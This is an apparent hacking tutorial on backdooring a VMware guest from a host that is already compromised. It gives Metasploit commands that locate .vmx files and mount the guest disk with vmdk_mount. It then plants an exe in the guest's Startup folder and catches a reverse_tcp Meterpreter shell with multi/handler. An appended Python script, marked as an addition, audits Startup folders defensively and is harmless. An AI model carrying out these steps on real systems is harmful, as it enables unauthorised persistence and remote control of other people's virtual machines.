Hello friends!! Today you will learn how to exploit any operating system running inside a virtual machine.
Requirement
Attacker: Kali Linux
Target: VM image Windows Server 2012
First, the attacker needs to exploit the actual operating system
of the victim PC and attain a meterpreter session with admin privileges.
From the given image you can perceive that I have seized a Windows 10
meterpreter session and also gained admin privileges.
meterpreter > sysinfo
When you install any operating system in VMware Workstation,
all of its hardware and network settings get stored as a .vmx file on the
actual operating system in order to create the new virtual image.
Type the following to search for the .vmx files stored on it:
meterpreter > search -f *.vmx -r
From the given image you can perceive
that it has dumped all the locations where .vmx files are stored.
Using the cat command you can read the content of a
file, as these files are simple text documents which contain VM setting information.
We opened the Windows Server 2012 VM image
through the cat command.
meterpreter > cat "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"
Here, from the image given below, you can read the details of
this file, which describes the network and hardware settings.
This module mounts a vmdk file (Virtual Machine Disk) on
a drive provided by the user by taking advantage of the vstor2 device driver
(VMware). First, it executes the binary vixDiskMountServer.exe to access the
device and then it sends certain control code via DeviceIoControl to mount it.
Use the write mode with extreme care. You should only open a disk file in
writable mode if you know for sure that no snapshots or clones are linked from
the file.
use post/windows/manage/vmdk_mount
msf post(vmdk_mount) > set DEL_LCK true
msf post(vmdk_mount) > set READ_MODE false
msf post(vmdk_mount) > set session 2
msf post(vmdk_mount) > set VDK_PATH "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"
msf post(vmdk_mount) > run
Great!! We
have successfully mounted the vmdk file of Windows Server 2012.
meterpreter > show_mount
Now, from the image given below, you can read the information of
each drive.
Now, using the command given below, I will upload an exe backdoor
to the L: drive, which will give us a reverse connection from Windows Server 2012
when it is running inside the VM workstation.
meterpreter > upload /root/Desktop/abc.exe "L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup"
use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.113
msf exploit(handler) > set lport 445
msf exploit(handler) > run
Awesome!! We
have successfully exploited the Windows Server 2012 virtual machine and gained its
meterpreter session.
meterpreter > sysinfo
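The defender's counterpart to the Startup-folder step above, as an added example that is not part of the original post: a file dropped into a guest disk while the VM is powered off never passes the guest's own real-time monitoring, so the Startup folders have to be audited on the disk itself. The sketch assumes the guest volume is already mounted read-only on an analysis machine at a path you supply (`volume_root` is a hypothetical parameter) and that you keep a baseline of approved SHA-256 hashes; the sample tree is constructed.

```python
import hashlib
import tempfile
from pathlib import Path

# Startup folders relative to the root of a Windows volume: the all-users
# folder the article writes to, and the per-user equivalent.
STARTUP_GLOBS = (
    "ProgramData/Microsoft/Windows/Start Menu/Programs/Startup",
    "Users/*/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup",
)
# Extensions that run or launch something at logon (not exhaustive).
RISKY = {".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".lnk"}


def sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def audit_startup(volume_root, approved_hashes=frozenset()):
    """Return (relative_path, sha256) for each Startup item that can run code
    and is not in the approved baseline. volume_root is an assumed mount point."""
    root = Path(volume_root)
    findings = []
    for pattern in STARTUP_GLOBS:
        for folder in filter(Path.is_dir, root.glob(pattern)):
            for item in sorted(folder.iterdir()):
                if item.is_file() and item.suffix.lower() in RISKY:
                    digest = sha256(item)
                    if digest not in approved_hashes:
                        findings.append((item.relative_to(root).as_posix(), digest))
    return findings


def build_sample_volume(base):
    """Constructed sample tree standing in for a mounted guest volume."""
    startup = Path(base) / STARTUP_GLOBS[0]
    startup.mkdir(parents=True)
    (startup / "desktop.ini").write_bytes(b"[.ShellClassInfo]\r\n")
    (startup / "updater.lnk").write_bytes(b"constructed approved shortcut")
    (startup / "abc.exe").write_bytes(b"MZ constructed unknown binary")
    return sha256(startup / "updater.lnk")  # hash of the one approved item


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        approved = {build_sample_volume(tmp)}
        for rel, digest in audit_startup(tmp, approved):
            print(f"UNAPPROVED {rel} sha256={digest}")
```

Path matching here is case-sensitive, so on a case-sensitive analysis host the folder names must match the casing on the volume.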